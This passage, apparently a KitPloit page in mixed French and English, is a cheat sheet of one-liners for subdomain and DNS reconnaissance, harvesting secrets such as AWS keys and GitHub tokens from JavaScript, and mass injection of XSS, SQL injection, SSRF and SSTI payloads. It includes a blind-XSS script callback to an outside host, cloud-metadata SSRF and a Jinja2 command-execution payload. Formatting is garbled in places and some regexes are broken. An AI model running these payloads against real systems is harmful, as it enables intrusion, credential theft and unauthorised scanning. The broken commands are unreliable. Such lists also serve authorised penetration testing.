curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt

💀 Extraction CommonCrawl```bash

☠️ CommonCrawl subdomain extraction

curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's//.*//g' | sort -u | anew commoncrawl_subs.txt

root@kitploit:~
### 💀 Sous-domaines de VirusTotal```bash
# ☠️ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt

💀 Tentative de transfert de zone DNS```bash

☠️ Check for zone transfer vulnerability

dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/.$//' | anew zone_transfer.txt

root@kitploit:~
### 💀 Recherche IP inversée```bash
# ☠️ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt

💀 Scanner de plage BGP/ASN```bash

☠️ Get ASN and scan all IP ranges

whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt

root@kitploit:~
### 💀 PTR Records à partir d'une plage IP```bash
# ☠️ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt

💀 Méga one-liner tout-en-un```bash

☠️ THE ULTIMATE SUBDOMAIN HUNTER ☠️

(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/*.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's//.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt

root@kitploit:~
### 💀 Sous-domaine Permutation/Force brute```bash
# ☠️ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt

💀 DNS Wordlist Bruteforce avec PureDNS```bash

☠️ Fast bruteforce with PureDNS

puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt

root@kitploit:~
### 💀 Récupérateur de certificats TLS/SSL```bash
# ☠️ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt

💀 Favicon Hash -> Shodan```bash

☠️ Find related hosts via favicon hash

curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}' | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt

root@kitploit:~
### 💀 Google Dork Découverte de sous-domaines```bash
# ☠️ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.com

🔐 Reconnaissance TLS/SSL (TLSX)

``` ████████╗██╗ ███████╗██╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗ ╚══██╔══╝██║ ██╔════╝╚██╗██╔╝ ██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║ ██║ ██║ ███████╗ ╚███╔╝ ██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║ ██║ ██║ ╚════██║ ██╔██╗ ██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║ ██║ ███████╗███████║██╔╝ ██╗ ██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ``` **🔐 Intelligence des certificats TLS/SSL avec TLSX 🔐**

🔐 Scan de base des certificats TLS```bash

🔐 Full TLS certificate details extraction

echo target.com | tlsx -san -cn -so -sv -ss -serial -hash md5 -jarm -ja3 -wc -tps -ve -ce -ct -cdn -silent | tee tlsx_full.txt

root@kitploit:~
### 🔐 Découverte de sous-domaines via SANs```bash
# 🔐 Extract all subdomains from certificate SANs
subfinder -d target.com -silent | tlsx -san -cn -silent -resp-only | grep -oE "[a-zA-Z0-9.-]+\.target\.com" | sort -u | anew san_subdomains.txt

🔐 Chasseur de certificats expirés```bash

🔐 Find hosts with expired SSL certificates

cat hosts.txt | tlsx -expired -silent -cn -so | tee expired_certs.txt

root@kitploit:~
### 🔐 Détection de certificat auto-signé```bash
# 🔐 Identify self-signed certificates (potential security issue)
cat hosts.txt | tlsx -self-signed -silent -cn -so -hash sha256 | tee self_signed.txt

🔐 TLS Version Enumeration (Weak TLS)```bash

🔐 Find hosts with deprecated TLS versions (TLS 1.0/1.1)

cat hosts.txt | tlsx -tls-version -silent | grep -E "(tls10|tls11)" | tee weak_tls_versions.txt

root@kitploit:~
### 🔐 Pipeline de prise d'empreintes JARM```bash
# 🔐 JARM fingerprint for server identification and correlation
subfinder -d target.com -silent | httpx -silent | tlsx -jarm -silent -json | jq -r '[.host, .jarm_hash] | @tsv' | sort -k2 | anew jarm_fingerprints.txt

🔐 Analyse de la chaîne de certificats et de l'émetteur```bash

🔐 Analyze certificate chain and identify CA

cat hosts.txt | tlsx -so -serial -hash sha256 -ve -ce -json -silent | jq -r '[.host, .issuer_cn, .not_after, .serial] | @tsv' | anew cert_chain_analysis.txt

root@kitploit:~
### 🔐 Scan TLS de masse avec énumération des chiffrements```bash
# 🔐 Full cipher suite enumeration + TLS version
subfinder -d target.com -silent | httpx -silent | tlsx -cipher -tls-version -silent -json | jq -r '[.host, .version, .cipher] | @tsv' | anew cipher_enum.txt

🔐 Détection de certificat non concordant```bash

🔐 Find certificates where CN doesn't match the hostname

cat hosts.txt | tlsx -mismatched -cn -san -silent | tee mismatched_certs.txt

root@kitploit:~
### 🔐 Pipeline de reconnaissance TLS ultime```bash
# 🔐 Complete TLS intelligence gathering
subfinder -d target.com -all -silent | httpx -silent -p 443,8443,4443,9443 | tlsx -san -cn -so -sv -ss -serial -expired -self-signed -mismatched -tls-version -jarm -hash sha256 -json -silent | jq -c '{host: .host, cn: .subject_cn, san: .san, issuer: .issuer_cn, expired: .expired, self_signed: .self_signed, tls: .version, jarm: .jarm_hash}' | tee tlsx_full_recon.json

🌐 Intelligence DNS (DNSX)

``` ██████╗ ███╗ ██╗███████╗██╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗ ██╔══██╗████╗ ██║██╔════╝╚██╗██╔╝ ██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║ ██║ ██║██╔██╗ ██║███████╗ ╚███╔╝ ██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║ ██║ ██║██║╚██╗██║╚════██║ ██╔██╗ ██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║ ██████╔╝██║ ╚████║███████║██╔╝ ██╗ ██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║ ╚═════╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ``` **🌐 Reconnaissance DNS et collecte de renseignements avec DNSX 🌐**

🌐 1. Résolution DNS de masse + filtrage de wildcard```bash

🌐 Resolve subdomains and filter out wildcards

subfinder -d target.com -silent | dnsx -silent -a -resp-only -wd target.com | sort -u | anew resolved_ips.txt

root@kitploit:~
### 🌐 2. Énumération DNS multi-types d'enregistrements```bash
# 🌐 Query A, AAAA, CNAME, MX, NS, TXT records simultaneously
echo target.com | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp | tee full_dns_records.txt

🌐 3. Extraction CNAME pour la prise de contrôle de sous-domaine```bash

🌐 Find dangling CNAMEs pointing to vulnerable services

subfinder -d target.com -silent | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|herokuapp|github|azure|shopify|fastly|pantheon|zendesk|readme|ghost|surge|bitbucket|wordpress|tumblr)" | anew cname_takeover_candidates.txt

root@kitploit:~
### 🌐 4. DNS inversé (PTR) sur des plages IP```bash
# 🌐 Discover hidden hosts via reverse DNS lookups
prips 192.168.1.0/24 | dnsx -silent -ptr -resp-only | anew ptr_discovered_hosts.txt

🌐 5. MX Records pour l'analyse de sécurité des emails```bash

🌐 Extract MX records to identify mail servers and SPF bypass opportunities

cat domains.txt | dnsx -silent -mx -resp | awk '{print $1, $2}' | sort -u | tee mx_records.txt && cat domains.txt | dnsx -silent -txt -resp | grep -i "spf" | anew spf_records.txt

root@kitploit:~
### 🌐 6. Enregistrements NS + Vérification de transfert de zone DNS```bash
# 🌐 Enumerate nameservers and check for misconfigured zone transfers
cat domains.txt | dnsx -silent -ns -resp-only | tee nameservers.txt && cat nameservers.txt | xargs -I@ -P10 sh -c 'host -t axfr target.com @ 2>&1 | grep -v "failed\|timed out" && echo "[ZONE TRANSFER] @"' | anew zone_transfers.txt

🌐 7. Attaque par force brute DNS avec des résolveurs personnalisés```bash

🌐 Mass DNS brute-force with custom resolver list

cat wordlist.txt | sed 's/$/.target.com/' | dnsx -silent -r resolvers.txt -rl 500 -t 200 -retry 3 -resp-only | anew bruteforced_subs.txt

root@kitploit:~
### 🌐 8. Sortie JSON pour analyse avancée```bash
# 🌐 Full DNS recon with JSON output for pipeline integration
subfinder -d target.com -silent | dnsx -silent -a -aaaa -cname -mx -ns -txt -ptr -resp -json | jq -c '{host: .host, a: .a, aaaa: .aaaa, cname: .cname, mx: .mx, ns: .ns, txt: .txt}' | tee dns_full_recon.json

🌐 9. Découverte d'ASN via DNS + corrélation IP```bash

🌐 Resolve domains, extract unique IPs, and identify ASN ownership

subfinder -d target.com -silent | dnsx -silent -a -resp-only | sort -u | tee target_ips.txt | xargs -I{} sh -c 'whois {} 2>/dev/null | grep -iE "(netname|orgname|asn|origin)" | head -5' | anew asn_info.txt

root@kitploit:~
### 🌐 10. Pipeline de reconnaissance DNS ultime```bash
# 🌐 Complete DNS intelligence gathering
domain="target.com"; subfinder -d $domain -all -silent | tee subs_$domain.txt | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp -json -o dns_records_$domain.json; cat subs_$domain.txt | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|azure|github)" | anew takeover_$domain.txt; cat dns_records_$domain.json | jq -r '.a[]?' | sort -u | dnsx -silent -ptr -resp-only | anew ptr_$domain.txt; echo "[+] DNS Recon Complete: $(wc -l < subs_$domain.txt) subdomains | $(cat dns_records_$domain.json | wc -l) records"

🎯 Astuce Pro : Utilisez des résolveurs personnalisés pour de meilleures performances : dnsx -r resolvers.txt -rl 1000


📜 Reconnaissance JavaScript

Pipeline JS complet```bash

subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '.js$' | anew js.txt

root@kitploit:~
### Extraire les secrets de JS```bash
cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -target js.txt

LinkFinder sur les fichiers JS```bash

cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt

root@kitploit:~
### SecretFinder Scan de masse```bash
cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt

Extraction de variables JS```bash

cat file.js | grep -oE "var\s+\w+\s*=\s*['"][^'"]+['"]" | sort -u

root@kitploit:~
### Clés API depuis JS```bash
cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt

Extraire toutes les URLs des JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "(https?://[^"'`\s<>]+)" | sort -u | anew js_urls.txt

root@kitploit:~
### Trouver les points de terminaison API dans JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+|/v[0-9]+/[^\"\'\`\s\<\>]+)" | sort -u

Extraire les identifiants codés en dur```bash

cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u

root@kitploit:~
### Extraire les clés AWS depuis JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt

Extraire les clés API Google de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z-_]{35}" | sort -u | anew google_api_keys.txt

root@kitploit:~
### Extraire les URL Firebase du JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebase\.com" | sort -u | anew firebase_urls.txt

Extraire les S3 Buckets depuis JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+.s3.amazonaws.com|s3://[a-zA-Z0-9.-]+|s3-[a-zA-Z0-9-]+.amazonaws.com/[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt

root@kitploit:~
### Extraire les IP internes depuis JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" | sort -u | anew internal_ips.txt

Extraire les webhooks Slack depuis JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+" | sort -u | anew slack_webhooks.txt

root@kitploit:~
### Extraire les GitHub Tokens depuis JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59})" | sort -u | anew github_tokens.txt

Extraire les clés privées depuis JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "-----BEGIN (RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY( BLOCK)?-----" | sort -u | anew private_keys_found.txt

root@kitploit:~
### Extraire les adresses e-mail depuis JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | anew emails_from_js.txt

Extraire les sous-domaines cachés des JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[a-zA-Z0-9.-]+.[a-zA-Z]{2,}" | sed 's|https?://||' | cut -d'/' -f1 | sort -u | anew subdomains_from_js.txt

root@kitploit:~
### 💀 Extraire les points de terminaison GraphQL de JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txt

💀 Extraire les JWT Tokens des fichiers JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-].eyJ[A-Za-z0-9_-].[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txt

root@kitploit:~
### 💀 Trouver Webpack Source Maps```bash
cat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txt

💀 Extraire les Webhooks Discord depuis JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew discord_webhooks.txt

root@kitploit:~
### 💀 Trouver les routes administrateur cachées dans JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt

💉 Détection XSS

Dalfox Pipeline```bash

cat urls.txt | gf xss | uro | qsreplace '">' | dalfox pipe --silence --skip-bav

root@kitploit:~
### XSS aveugle avec callback```bash
cat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silent

Airixss Fast Scan```bash

echo target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '">' | airixss -payload "confirm(1)"

root@kitploit:~
### Knoxss API```bash
cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"

Détection DOM XSS```bash

cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval(|.write()" && echo "--- @ ---"'

root@kitploit:~
### XSS de masse avec Nuclei DAST```bash
cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50

Détection de paramètre réfléchi```bash

cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txt

root@kitploit:~
### Test polyglotte XSS```bash
cat urls.txt | gf xss | qsreplace "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcLiCk=alert() )//" | httpx -silent -mr "alert"

🗄️ SQL Injection

SQLMap Mass Scan```bash

cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2

root@kitploit:~
### Détection basée sur les erreurs```bash
cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txt

Aveugle basé sur le temps```bash

cat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txt

root@kitploit:~
### Ghauri Scan```bash
cat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3

Détection UNION```bash

cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200

root@kitploit:~
### Détection basée sur les booléens```bash
cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txt

Injection NoSQL```bash

cat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txt

root@kitploit:~
---

## 🌐 SSRF & SSTI

### SSRF avec Interactsh```bash
cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silent

Fuzzing de paramètres SSRF```bash

cat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"

root@kitploit:~
### Détection SSTI```bash
cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txt

SSTI Payload Test```bash

cat urls.txt | qsreplace '${77}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 77 %>' | httpx -silent -mr "49"

root@kitploit:~
### Chaîne SSRF complète```bash
cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silent

SSRF avec DNS Rebinding```bash

cat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silent

root@kitploit:~
### Jinja2 SSTI```bash
cat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silent

🕷️ Web Crawling

Katana Deep Crawl```bash

katana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txt

root@kitploit:~
### Gospider Crawl Complet```bash
gospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anew

Hakrawler avec portée```bash

echo https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txt

root@kitploit:~
### ParamSpider Découverte```bash
paramspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txt

Waymore URLs historiques```bash

waymore -i target.com -mode U -oU urls.txt

root@kitploit:~
### Exploration avec un navigateur headless```bash
katana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txt

Extraction de formulaires```bash

katana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt

root@kitploit:~
### 💀 Katana Deep Crawl Multi-Cible + Parsing JS```bash
# ☠️ Crawl multiple targets with JavaScript parsing and form extraction
cat alive.txt | katana -d 8 -jc -kf all -aff -ef woff,css,png,svg,jpg,woff2,jpeg,gif,ico -c 50 -p 20 -silent -o katana_multi.txt

💀 Gospider Récursif + Plan du site + robots```bash

☠️ Full crawl with sitemap parsing and robots.txt extraction

gospider -S alive.txt -c 30 -d 5 -t 20 --sitemap --robots --js -a -w --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg)" -o gospider_output && cat gospider_output/* | grep -oE 'https?://[^"]+' | sort -u | anew gospider_urls.txt

root@kitploit:~
### 💀 Hakrawler + Wayback + GAU Crawler Combiné```bash
# ☠️ Triple source crawling: live + wayback + gau
echo target.com | hakrawler -d 5 -subs -u > hakrawler.txt && waybackurls target.com > wayback.txt && gau target.com > gau.txt && cat hakrawler.txt wayback.txt gau.txt | sort -u | httpx -silent | anew all_crawled.txt

💀 Katana Headless + Remplissage automatique de formulaire + Capture d'écran```bash

☠️ Headless browser crawl with form interaction and XHR capture

katana -u https://target.com -headless -d 6 -jc -aff -xhr -form -timeout 15 -silent -nc -c 20 | anew headless_interactive.txt

root@kitploit:~
### 💀 Cariddi Crawl complet avec Détection de secrets```bash
# ☠️ Crawl with built-in secrets/endpoints/parameters extraction
cariddi -u https://target.com -d 5 -s -e -ext 1 -plain -t 50 -c 20 | tee cariddi_results.txt && grep -E "(api|secret|key|token|pass|auth)" cariddi_results.txt | anew secrets_found.txt

💀 Pipeline de Crawler de Domaine Parallèle```bash

☠️ Mass parallel crawling with deduplication

cat domains.txt | parallel -j 10 "katana -u https://{} -d 5 -jc -silent" | uro | anew parallel_crawl.txt

root@kitploit:~
### 💀 Katana + Gospider + LinkFinder Chain```bash
# ☠️ Combined crawling + JS endpoint extraction pipeline
katana -u https://target.com -d 5 -jc -silent | grep "\.js$" | httpx -silent | xargs -I@ bash -c 'curl -s @ | grep -oE "(\/[a-zA-Z0-9_\-\/]+)" | sort -u' | anew js_endpoints.txt && gospider -s https://target.com -d 5 -c 10 --js -q | grep -oE 'https?://[^"]+' | anew combined_crawl.txt

💀 Crawl récursif + Pipeline de scan automatique Nuclei```bash

☠️ Crawl then auto-scan discovered endpoints for vulnerabilities

katana -u https://target.com -d 6 -jc -kf all -aff -silent | tee crawl_output.txt | grep -E ".(php|asp|aspx|jsp|do|action)(?|$)" | nuclei -t /root/nuclei-templates/ -severity high,critical -silent -o crawl_vulns.txt

root@kitploit:~
### 💀 Waymore + Katana Historique + Fusion en Direct```bash
# ☠️ Merge historical URLs with live crawl for maximum coverage
waymore -i target.com -mode U -oU waymore_urls.txt && katana -u https://target.com -d 5 -jc -aff -silent -o katana_live.txt && cat waymore_urls.txt katana_live.txt | uro | httpx -silent -mc 200,301,302,403 | anew merged_crawl.txt

💀 Dédoublonnage de sortie du Multi-Crawler + Extraction de paramètres```bash

☠️ Run all crawlers and extract unique parameters

(gospider -s https://target.com -d 3 -c 10 -q; hakrawler -url https://target.com -d 3; katana -u https://target.com -d 3 -jc -silent) | sort -u | unfurl -u keys | sort | uniq -c | sort -rn | head -100 | anew top_params.txt

root@kitploit:~
---

## 🔑 Découverte des paramètres

### Paramètres cachés X8```bash
cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt

Arjun Découverte```bash

arjun -i urls.txt -oT arjun_params.txt --stable

root@kitploit:~
### Bruteforce de paramètres personnalisés```bash
cat urls.txt | sed 's/$/\?FUZZ=test/' | ffuf -w params.txt:FUZZ -u FUZZ -mc 200,301,302 -ac

Extraire les paramètres depuis JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u

root@kitploit:~
### Test de pollution de paramètres```bash
cat urls.txt | qsreplace 'param=value1&param=value2' | httpx -silent -mc 200

📁 Découverte de contenu

Ffuf Bruteforce de répertoires```bash

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100

root@kitploit:~
### 💀 Fuzzing récursif - ffuf Deep Scan```bash
# ☠️ Recursive directory bruteforce with depth 3
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -mc 200,301,302,403 -ac -c -t 100 -o ffuf_recursive.json -of json

💀 Feroxbuster Scan récursif complet```bash

☠️ Deep recursive scan with auto-tune and smart filtering

feroxbuster -u https://target.com -w wordlist.txt -d 5 -L 4 --auto-tune -C 404,500 --smart -o ferox_results.txt

root@kitploit:~
### 💀 Feroxbuster Récursif Multi-Cible```bash
# ☠️ Scan multiple targets from file with recursion
cat alive.txt | xargs -I@ feroxbuster -u @ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 3 -t 50 --no-state -q -o [email protected]

💀 Pipeline ffuf + Feroxbuster (Extensions + Récursion)```bash

☠️ Find directories with ffuf, then deep scan each with feroxbuster

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 -ac -c -t 100 -o dirs.json -of json && cat dirs.json | jq -r '.results[].url' | xargs -I@ feroxbuster -u @ -w wordlist.txt -x php,asp,aspx,jsp,html,js -d 2 -t 30 -q

root@kitploit:~
### 💀 Fuzzing récursif avec analyse en masse des extensions```bash
# ☠️ ffuf recursive with multiple extensions + backup files
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2 -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.conf,.config,.zip,.tar.gz -mc 200,301,302,403,500 -ac -t 80 -rate 100 -o recursive_ext.json

💀 Feroxbuster Scan récursif parallèle```bash

☠️ Parallel scan with multiple wordlists and extensions

feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,jsp,bak,old,zip -d 4 -t 100 -L 5 --parallel 10 --dont-extract-links -C 404 -o ferox_parallel.txt

root@kitploit:~
### 💀 Feroxbuster Silencieux Récursif + En-têtes```bash
# ☠️ Stealth recursive scan with custom headers and rate limiting
feroxbuster -u https://target.com -w wordlist.txt -d 3 -t 30 -r -k --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" --rate-limit 50 -C 400,401,403,404,500 -q -o ferox_stealth.txt

💀 Feroxbuster Extraire les liens + Récursif```bash

☠️ Extract links from responses and add to scan queue recursively

feroxbuster -u https://target.com -w wordlist.txt -d 5 --extract-links --collect-words --collect-backups -x php,html,js,json -t 50 -o ferox_extracted.txt

root@kitploit:~
### 💀 Feroxbuster Reprendre + Filtrer par taille```bash
# ☠️ Smart filtering by response size and resumable state
feroxbuster -u https://target.com -w wordlist.txt -d 4 -S 0 -W 1 --filter-status 404,500 --filter-words 20 --filter-lines 5 --resume-from ferox_state.json --state-file ferox_state.json -o ferox_filtered.txt

💀 Découverte des points de terminaison API de Feroxbuster```bash

☠️ Recursive API fuzzing with JSON content-type

feroxbuster -u https://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -d 3 -x json -t 50 -H "Accept: application/json" -H "Content-Type: application/json" --dont-extract-links -m GET,POST -o ferox_api.txt

root@kitploit:~
### Exposition Git```bash
cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt

Fichiers Sensibles```bash

cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt

root@kitploit:~
### Fichiers de sauvegarde```bash
cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200

Documentation API```bash

cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt

root@kitploit:~
### Fuite de code source```bash
cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt

Fichiers de configuration```bash

cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt

root@kitploit:~
### Fichiers de base de données```bash
cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt

⚡ Scan avec Nuclei

Scan complet de templates```bash

nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt

root@kitploit:~
### Analyse des CVE```bash
nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt

Prise de contrôle de sous-domaine```bash

subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50

root@kitploit:~
### Panneaux exposés```bash
nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txt

Mauvaises configurations```bash

